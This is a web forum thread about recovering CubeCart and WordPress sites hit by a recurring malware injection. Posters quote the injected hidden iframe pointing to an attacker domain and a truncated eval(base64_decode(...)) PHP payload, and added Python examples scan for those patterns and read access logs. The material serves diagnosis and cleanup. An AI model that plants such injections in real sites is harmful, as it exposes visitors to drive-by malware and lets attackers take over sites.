Please help to solve this error


Since yesterday our web site is broken. All of a sudden it started giving this message:

Warning: ini_set() [ref.outcontrol]: Cannot change zlib.output_compression - headers already sent in /home/content/c/i/t/citylifeusa/html/store/ini.inc.php on line 114

Warning: Cannot modify header information - headers already sent by (output started at /home/content/c/i/t/citylifeusa/html/store/index.php(1) : eval()'d code:37) in /home/content/c/i/t/citylifeusa/html/store/index_enc_ion.php on line 31

Warning: Cannot modify header information - headers already sent by (output started at /home/content/c/i/t/citylifeusa/html/store/index.php(1) : eval()'d code:37) in /home/content/c/i/t/citylifeusa/html/store/index_enc_ion.php on line 32

Warning: session_start() [function.session-start]: Cannot send session cookie - headers already sent by (output started at /home/content/c/i/t/citylifeusa/html/store/index.php(1) : eval()'d code:37) in /home/content/c/i/t/citylifeusa/html/store/classes/session/cc_session.php on line 213

Warning: session_start() [function.session-start]: Cannot send session cache limiter - headers already sent (output started at /home/content/c/i/t/citylifeusa/html/store/index.php(1) : eval()'d code:37) in /home/content/c/i/t/citylifeusa/html/store/classes/session/cc_session.php on line 213

Warning: session_regenerate_id() [function.session-regenerate-id]: Cannot regenerate session id - headers already sent in /home/content/c/i/t/citylifeusa/html/store/classes/session/cc_session.php on line 214

Warning: Cannot modify header information - headers already sent by (output started at /home/content/c/i/t/citylifeusa/html/store/index.php(1) : eval()'d code:37) in /home/content/c/i/t/citylifeusa/html/store/classes/session/cc_session.php on line 234

I called the hosting company and they said to contact CubeCart for this. They cannot do anything. Does anyone know how to fix this? Please help.


I called the hosting company and they said to contact CubeCart for this. They cannot do anything. Does anyone know how to fix this? Please help.

Have you contacted CubeCart support?

For a site to just have this start happening without any changes to your store code, it's either a hosting issue (they changed something) or your site files have been changed without your knowledge.

Check the file dates on your PHP files for anything recent to around the time this started happening. Look at the files referenced in the error first.


  • 2 weeks later...

I still could not solve the problem. I am not very familiar with these security issues. Did you get it fixed? Please let me know. I'm having sleepless nights because of this issue. :(


I opened a ticket with CubeCart support and they were not helpful at all. Instead they wrote back saying that, since this site is blacklisted by Google as having malware, I should get the malware issue fixed and then they'll see if there's anything to do with CubeCart. I don't know why the web designer used CubeCart for the shopping cart. I'm so frustrated with CubeCart support.

I found malicious code in the index file. As soon as I delete it, the site comes back perfectly and the shopping cart works too. But the next day, or even a few hours later, the code is generated again in the index and the site gets broken. I don't know where or how to find the root cause. :( Thank you for the reply.


Please look at the web access logs for your hosting space. Hopefully your hosting provider gives you access to these files. Those access log files will show the file being exploited to damage your site.

If you require personal assistance in helping you determine if you have access to your web access logs and what to look for in those logs, please send me a private message.

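Added example, not part of the original post or of CubeCart: one way to use the access logs as suggested above is to list the requests that reached PHP scripts in the minutes before the infected file's modification time. The log lines, addresses, paths and timestamp are constructed, and the Apache combined log format is an assumption.

```python
import re
from datetime import datetime, timedelta, timezone

# Apache/NCSA combined log format is assumed; adjust the pattern to your host's logs.
LINE = re.compile(r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                  r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) ')

# Constructed sample lines (documentation-range addresses, made-up paths).
SAMPLE_LOG = """\
192.0.2.10 - - [18/Feb/2024:09:40:00 +0000] "POST /store/index.php HTTP/1.1" 200 300 "-" "Mozilla/5.0"
192.0.2.10 - - [18/Feb/2024:09:58:02 +0000] "GET /store/index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [18/Feb/2024:10:01:44 +0000] "POST /images/tmp/a.php HTTP/1.1" 200 17 "-" "-"
198.51.100.4 - - [18/Feb/2024:10:01:50 +0000] "GET /store/logo.png HTTP/1.1" 200 900 "-" "Mozilla/5.0"
""".splitlines()

def parse(line):
    """Parse one log line into a dict with an aware datetime, or None if malformed."""
    m = LINE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return rec

def requests_before(lines, modified_at, window_minutes=10):
    """Requests to .php scripts in the window before a file's modification time.

    POSTs that returned 200 sort first, as the entries to read first.
    """
    start = modified_at - timedelta(minutes=window_minutes)
    hits = [r for r in map(parse, lines)
            if r and start <= r["ts"] <= modified_at and ".php" in r["path"].lower()]
    return sorted(hits, key=lambda r: (r["method"] != "POST", r["status"] != "200", r["ts"]))

def demo():
    # Constructed: pretend index.php was last rewritten at 10:02:00 UTC.
    # On a real host: datetime.fromtimestamp(os.path.getmtime(path), timezone.utc)
    modified_at = datetime(2024, 2, 18, 10, 2, 0, tzinfo=timezone.utc)
    return [(r["ip"], r["method"], r["path"]) for r in requests_before(SAMPLE_LOG, modified_at)]

if __name__ == "__main__":
    print(*demo(), sep="\n")
```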

I have rebuilt my store from scratch on a different directory, and it is no longer infected. However, all my other subdomains are still infected, which makes me think that there is some rogue code somewhere on one or more of my sites which is regenerating the iframe whenever it is loaded. I have searched for the usual suspects (eval, base64_decode, gzinflate, gzuncompress) but there's got to be something else out there that is doing the damage.

I have also reported it to unmaskparasites.com as follows:

repeated hacks into all index.htm files;

insert of iframe "<iframe src="http://bdfj45jfdkhkm.co.cc/QQkFBg0AAQ0MBA0DEkcJBQYNAwcCAQMMAw==" width="1" height="1"></iframe>" as first line after <body> tag

or for index.php instances:

<?php

eval(base64_decode('[base64 payload omitted]'));

sites affected

http://www.wymeruk.co.uk/
http://www.wymeruk.co.uk/Store
http://mbtp.wymeruk.co.uk/
http://www.scruntlehawk.com/
http://autumn.wymeruk.co.uk/
http://www.removalsbedford.co.uk/
http://www.nicksimper.com/

I edit the files remotely to remove the iframe tags but within 24 hours they are back, usually referencing a new domain name in their src= statement.

I have changed all FTP passwords and upgraded WordPress where applicable.

All these sites are hosted on the same HostMonster account.

http://www.removalsbedford.co.uk/ was running an old version of WordPress prior to the attack.

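Added example, not part of the original posts: the two checks suggested in this thread (recent file dates, and a search for eval, base64_decode, gzinflate, gzuncompress and the 1x1 iframe) combined in one read-only scan, which also decodes the first layer of an eval(base64_decode(...)) payload for reading without running it. The demo webroot and its file contents are constructed.

```python
import base64, os, re, tempfile, time

# Strings the posters searched for, plus the 1x1 iframe quoted in the report.
CALLS = re.compile(rb"\b(eval|base64_decode|gzinflate|gzuncompress)\s*\(")
EVAL_B64 = re.compile(rb"eval\s*\(\s*base64_decode\s*\(\s*['\"]([A-Za-z0-9+/\s]+)")
IFRAME_1PX = re.compile(rb"<iframe[^>]*\b(?:width|height)\s*=\s*[\"']?[01][\"'\s>]", re.I)

def scan_file(path, since):
    """Return a finding for one file, or None when nothing matches."""
    with open(path, "rb") as fh:
        data = fh.read()
    reasons = sorted({m.group(1).decode() for m in CALLS.finditer(data)})
    if IFRAME_1PX.search(data):
        reasons.append("hidden-iframe")
    if not reasons:
        return None
    preview, m = None, EVAL_B64.search(data)
    if m:  # decoded for reading only, never executed; a partial last group is dropped
        blob = re.sub(rb"\s+", b"", m.group(1))
        preview = base64.b64decode(blob[:len(blob) // 4 * 4])[:40].decode("latin-1")
    return {"path": path, "reasons": reasons, "preview": preview,
            "recent": os.path.getmtime(path) >= since}

def scan_tree(root, since, exts=(".php", ".htm", ".html")):
    """Walk root; files modified at or after `since` (epoch seconds) sort first."""
    hits = []
    for dirpath, _dirs, names in os.walk(root):
        for name in names:
            if name.lower().endswith(exts) and (hit := scan_file(os.path.join(dirpath, name), since)):
                hits.append(hit)
    return sorted(hits, key=lambda h: (not h["recent"], h["path"]))

def demo():
    """Constructed webroot: two 90-day-old files and two files changed just now."""
    root = tempfile.mkdtemp()
    payload = base64.b64encode(b"error_reporting(0); /* constructed sample */").decode()
    files = {"about.htm": ("<body>hello</body>", 90),
             "lib.php": ("<?php $x = base64_decode($stored_token);", 90),
             "index.php": ("<?php eval(base64_decode('%s'));" % payload, 0),
             "index.htm": ('<body><iframe src="http://example.invalid/" width="1" height="1"></iframe>', 0)}
    for name, (body, age_days) in files.items():
        path = os.path.join(root, name)
        with open(path, "w") as fh:
            fh.write(body)
        stamp = time.time() - age_days * 86400
        os.utime(path, (stamp, stamp))
    return scan_tree(root, since=time.time() - 86400)

if __name__ == "__main__":
    print(*demo(), sep="\n")
```

A modification time can be set by whoever wrote the file, so a pattern hit on an old-looking file is unreviewed rather than cleared.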

My CubeCart version is 4.3.8. I have the same attack as Mike explained. It happened on Feb 18th. The iframe is also the same:

insert of iframe "<iframe src="http://bdfj45jfdkhkm.co.cc/QQkFBg0AAQ0MBA0DEkcJBQYNAwcCAQMMAw=="

But the malicious code was generated only inside the store folder's index.php file. And it's also the same as Mike's:

eval(base64_decode('ZXJyb3JfcmVwb3J0aW5nKDApOw0KJGJvdCA9IEZBTFNFIDsNCiR1c2VyX2FnZW50X3RvX2ZpbHRlciA9IGFycmF5KCdib...........

Last week, every time I deleted this code from the index page, the site came back to normal, but the code regenerated after a few hours.

But a few days ago I put in a security patch I found in the CubeCart forum and now this code has stopped generating in my index file. So the site looks okay.

But when I type www.citylifeusa.com in Internet Explorer, I can see in the status bar that the web site is redirecting through the hacker's domain http://bdfj45jfdkhkm.co.cc.

What do you think I should do about this? I'm sure the problem is not solved even though I don't get that header error message anymore. It looks like the traffic is going through the above bad domain. So they have captured my domain name?

I have attached a copy of the malicious code that used to generate inside the index.php.


You still have the iframe. It appears that the index file in your main site (as opposed to the store folder) has been damaged. I see the refresh to the /store/ folder, however, and a very quick glance through the store code as delivered to my browser shows no damage.

I believe they haven't captured your domain name.
